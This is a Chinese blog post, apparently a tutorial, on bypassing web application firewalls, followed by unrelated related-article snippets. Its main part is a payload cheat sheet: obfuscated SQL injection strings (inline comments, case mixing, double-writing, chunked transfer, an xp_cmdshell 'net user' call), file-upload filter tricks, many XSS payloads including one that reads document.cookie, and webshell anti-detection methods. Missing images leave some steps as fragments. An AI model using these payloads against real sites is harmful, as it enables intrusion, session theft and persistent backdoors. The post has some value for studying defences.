waf绕过

news2024/12/27 16:21:54

1.市场Waf分类
  

硬件Waf:绿盟、安恒、启明、知道创宇等
        需要选择模式
        透明模式
        反向代理分为反向代理(代理模式)与反向代理(牵引模式)
        反向代理又分为两种模式,反向代理(代理模式)与反向代理(牵引模式)
        旁路监控
软件Waf:安全狗、云锁、中间件自带的Waf模块
云WAF:阿里云、安全狗、知道创宇、安恒

2.WAF的检测方法
  

首先白名单黑名单身份认证--数据包解析--规则判断--拦截     

   

3.身份认证阶段绕过
    

  • 伪造搜索引擎绕过

        

  •  伪造白名单的特殊目录

        admin/../  方式绕过
        http://10.0.0.139:92/pikachu/pkxss/admin/../pkxss_login.php
         

4.数据包解析绕过
  

  •  1、burp安装waf模块

云WAF绕过方法:伪造XFF头为127.0.0.1或找出真实IP绕过 
 安装插件
          

     

              加一些路径
                                                

  • 2、通过工具伪造百度、google等user agent头或者伪造白名单特殊目录
  •  3、编码url绕过

  输入and 1=1


将and换位&&


进行url编码
                 

 

 去掉1=1


将1=1换位-1=-1


    4、修改请求方式绕过:利用waf的默认规则绕过,如默认只针对拦截,不对post拦截
        对方支持request
       为request就是可以


          

  •  5、复合参数绕过

        http://10.0.0.139:92/sql.php?id=1&id=and&id=1=2

  •     6、WAF触发规则的绕过

   内联注释代替空格/**/代替空格
     http://10.0.0.139:92/sql.php?id=1/*|%23--%23|*/and/*|%23--%23|*/-1=-1


特殊字符拼接
            例如: exec('maste'+'r..xp'+'_cmdshell'+'"net user"')
注释包含关键字
            /*!*/包含关键词
                GET /pen/news.php?id=1 /*!union*/ /*!select*/  user,password /*!from*/ mysql.user
            and /*!1*/=/*!1*/ #
                加!是被执行
            Lucy' order /*!11440 by*/ 1,2#
                跟这个数字有关,这是一个版本
            -1'  union /*!77777cz*//*!77777cz*/ select database/*!77777a*/(),2#
使用大小写
            http://www.***.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
双写绕过
            http://www.***.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
关键字替换
            xor异或绕过
            mod绕过
            = | like|in、group_concat() | concat_ws()、@@version | version()
利用WAF本身的功能绕过利用*代替空格
            ,如uni*on+sel*ect+1,2,3,4....
组合法
            and /*!1=1*/ %23
            把and为&&,urlencode后为%26%26  如:%20%26%26%20-1=-2

  •     7、分块传输绕过

 支持get 或request
  变更请求方法


 使用分块传输


 0代表传输完成

  • 8.利用其他变量或命令执行语句

      and mod(8,7) in (1)
      and mod(8,7) in (2)
       异或运算(测注入点)xor
            vince ' Xor '1'='1' #
            vince ' Xor '1'='2' #     

5.文件上传绕过
    

  • 方法一:等号绕过

        被waf拦截


 上传成功
                

  •     方法二:换行绕过

  •     方法三:填充垃圾字符

        在from-data前加一些垃圾字符
            

  •     方法四:突破0,文件名前缀加[0x09]绕过

  •         方法五:文件名去掉双引号绕过

6.XSS绕过Waf
  

  • HTML5 新标签

        <details%20open%20οntοggle=alert(/xss/)>
        <details open οntοggle=top['prompt'](1)>
          <details open οntοggle=top['al'%2b'ert'](1)>
          audio标签
            <audio src=x οnerrοr=alert(47)>
            <audio src=x οnerrοr=prompt(1);>
            <audio src=1 href=1 οnerrοr="javascript:alert(1)"></audio>
        video标签
            <video src=x οnerrοr=alert(48)>
            <video src=x οnerrοr=prompt(1);>
        div标签
            <div style="width:expression(alert(/1/))">1</div>     ie浏览器执行
            <div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv>   url编码绕过
        math标签
            <math><a/xlink:href=javascript:prompt(1)>Xss
            <math href="javascript:javascript:alert(1)">Xss</math> 
        button标签
            <button οnfοcus=alert(1) autofocus>
            <button/οnclick=alert(1) >xss</button>
            keygen/οnfοcus=prompt(1);>
        keygen标签
            <keygen οnfοcus=javascript:alert(1) autofocus>
        object标签
            <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
            base64加密:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg    <script>alert(1)</script>
        iframe标签
            <IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME>
            <iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d">
            <iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>

  •     大小写绕过
  •     javascript伪协议
  •     没有分号
  •     Flash
  •     Fuzz进行测试
  •     双层标签绕过 

7.Webshell免杀(服务端绕过)
    

用小马传大马(读取文件路径)
小马功能单一,大马功能多,小马代码少,小马作用就是传大码
 PHP小马
注释法(干扰waf)
 替换函数  

类函数组合法

把马创建成涵数,后面只要调用涵数就行

变量覆盖

在线加密

通过NTFS交换数据流文件实现文件隐藏

8.Webshell后门分析
    

代码分析定位法
抓包分析法
数据流量协议分析法
      

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1133159.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C++常见容器实现原理

引言 如果有一天&#xff01;你骄傲离去&#xff01;&#xff08;抱歉搞错了&#xff09;如果有一天&#xff0c;你在简历上写下了这段话&#xff1a; 那么你不得不在面试前实现一下STL常见的容器了。C的常用容器有&#xff1a;vector、string、deque、stack、queue、list、se…

合宙ESP32C3之Arduino、MicroPython上手

此处所说的ESP32C3&#xff0c;是合宙9.9元包邮的那一款&#xff0c;即所谓的“简约款”&#xff0c;无串口芯片。虽然有串口芯片的经典款版本兼容性更好&#xff0c;但随着各种IDE的不断升级&#xff0c;无串口使用起来也能游刃有余。 1.Arduino环境搭建 首先到Arduino.cc上下…

利用MATLAB创建栅格地图(代码可复制)

先做一个声明&#xff1a;文章是由我的个人公众号中的推送直接复制粘贴而来&#xff0c;因此对智能优化算法感兴趣的朋友&#xff0c;可关注我的个人公众号&#xff1a;启发式算法讨论。我会不定期在公众号里分享不同的智能优化算法&#xff0c;经典的&#xff0c;或者是近几年…

CoDeSys系列-3、Windows运行时软PLC主站和p-net从站IO设备组网测试

CoDeSys系列-3、Windows运行时软PLC主站和p-net从站IO设备组网测试 文章目录 CoDeSys系列-3、Windows运行时软PLC主站和p-net从站IO设备组网测试一、前言二、Windows运行时软plc配置编程1、安装Windows下的运行时扩展包&#xff08;非必要&#xff09;2、创建项目2.1、创建标准…

基于Java的新闻发布管理系统设计与实现(源码+lw+部署文档+讲解等)

文章目录 前言具体实现截图论文参考详细视频演示为什么选择我自己的网站自己的小程序&#xff08;小蔡coding&#xff09; 代码参考数据库参考源码获取 前言 &#x1f497;博主介绍&#xff1a;✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师、全栈领域优质创作者&am…

爬虫进阶-反爬破解8(反爬的实战练习:爬虫文件的解析和数据的抓取+反爬措施的分析和突破+Scrapy接入Cookie池管理系统+分布式爬虫的架设)

目录 一、爬虫文件的解析和数据的抓取 &#xff08;一&#xff09;项目的知识点 &#xff08;二&#xff09;实践操作&#xff1a;新建项目抓取数据 &#xff08;三&#xff09;总结 二、反爬措施的分析和突破 &#xff08;一&#xff09;项目知识点补充 &#xff08;二…

binutils 2.40 Linker (ld) 官方文档下载

前言 最近需要熟悉 elf 与 共享库 的链接与加载流程&#xff0c;需要先了解 elf 文件 是怎么链接的&#xff0c;链接脚本如何阅读 最有效的方式是查看 GNU 官方的 Linker (ld) 文档&#xff0c;通过查找&#xff0c;这个 Linker (ld) 属于 GNU binutils&#xff0c;当前的较新…

JS DataTable中导出PDF中文乱码

JS DataTable中导出PDF中文乱码 文章目录 JS DataTable中导出PDF中文乱码一. 问题二. 原因三. vfs_fonts.js四. pdfmake.js五. 解决六.参考资料 一. 问题 二. 原因 DataTable使用pdfmake&#xff0c;pdfmake默认字体为Roboto&#xff0c;不支持中文字体。添加自己的字体&#…

Shopee本土店与跨境店有何区别?如何入驻?

截止到目前&#xff0c;虾皮全球覆盖的站点已经有11个&#xff0c;其中东南亚站点依然是消费力强劲的大站点&#xff0c;包括马来西亚、泰国、印度尼西亚、菲律宾、越南、新加坡。到了2023&#xff0c;仍然有非常大的市场空间。 东南亚人口密度大&#xff0c;还是全球网络发展…

【项目管理】项目中如何进行风险管理

&#x1f449;博__主&#x1f448;&#xff1a;米码收割机 &#x1f449;技__能&#x1f448;&#xff1a;C/Python语言 &#x1f449;公众号&#x1f448;&#xff1a;测试开发自动化【获取源码商业合作】 &#x1f449;荣__誉&#x1f448;&#xff1a;阿里云博客专家博主、5…

threejs(4)-纹理材质高级操作

一、纹理重复_缩放_旋转_位移操作 // 导入threejs import * as THREE from "three"; // 导入轨道控制器 import { OrbitControls } from "three/examples/jsm/controls/OrbitControls.js"; // 导入lil.gui import { GUI } from "three/examples/jsm/l…

基于5G网关的风力发电远程监测方案优势

风力发电是清洁能源的典型代表&#xff0c;是我国能源结构转型的重要组成。近年来我国大力发展风能、水能、光伏等清洁能源&#xff0c;加速双碳战略&#xff0c;长期致力于创造人与生态友好和谐的人居社会。 针对风力发电机组和厂区的运营和管理&#xff0c;5G技术、物联网技…

CrossOver23.6软件激活码怎么获取 CrossOver软件2023怎么激活

CrossOver一款类虚拟机&#xff0c;它的主要功能是在mac系统中安装windows应用程序。其工作原理是将exe格式的windows应用程序安装包安装至CrossOver容器中&#xff0c;并将运行该exe文件所需的配置文件下载至容器中&#xff0c;便能在mac正常运行windows应用程序了。下面就让我…

JavaSE介绍与第一个Java程序

JavaSE介绍与第一个Java程序 一、Java简介二、Java特点三、编译运行过程四、JDK、JRE和JVM的关系五、第一个Java程序1、HelloWorld2、注意事项 六、标识符与命名规范1、标识符&#xff08;1&#xff09;什么是标识符&#xff08;2&#xff09;标识符的命名规则 2、命名规范&…

C++初阶:C/C++内存管理

一.C/C内存分布 先来回顾一下C语言内存分区示意图如下&#xff1a; 代码区&#xff1a; 程序执行代码一般存放在代码区&#xff0c;字符串常量以及define定义的常量也可能存放在代码区。 常量区&#xff1a; 字符串&#xff0c;数字等常量以及const修饰的全局变量往往存放在…

【UE】UMG通信的三种方法

目录 前言 方法一&#xff1a;通过“获取类的所有控件”节点通信 方法二&#xff1a;当创建控件蓝图时传入其它控件蓝图的对象引用 *方法三&#xff1a;使用HUD类来管理UMG通信 前言 首先我们创建了三个控件蓝图&#xff0c;那么其中的一个控件蓝图如何与剩下的控件蓝图通…

网络编程进化史:Netty Channel 的崭新篇章

上篇文章&#xff08;Netty 入门 — ByteBuf&#xff0c;Netty 数据传输的载体&#xff09;&#xff0c;我们了解了 Netty 的数据是以 ByteBuf 为单位进行传输的&#xff0c;但是有了数据&#xff0c;你没有通道&#xff0c;数据是无法传输的&#xff0c;所以今天我们来熟悉 Ne…

2023 年专业人士必须尝试的 15 款人工智能工具

在本文中&#xff0c;我们将看到一些人工智能驱动的工具&#xff0c;这些工具将在 2023 年彻底改变开发并使专业人士的生活变得轻松。我们将讨论旨在为专业人士提供支持的 15 种顶级人工智能和低代码工具。人工智能工具现在变得更加强大&#xff0c;使他们能够创造有影响力的产…

数字图像处理(十六)非局部均值去噪

文章目录 一、前言二、NL-means1.两个邻域块的相似度2.NL-means原理3.数学理论推导4.代码链接 参考链接 一、前言 在之前我们已经介绍过许多图像去噪的方法&#xff0c;比如均值滤波、中值滤波、高斯滤波等。今天我们要介绍一种新的去噪方法——非局部均值去噪&#xff08;the…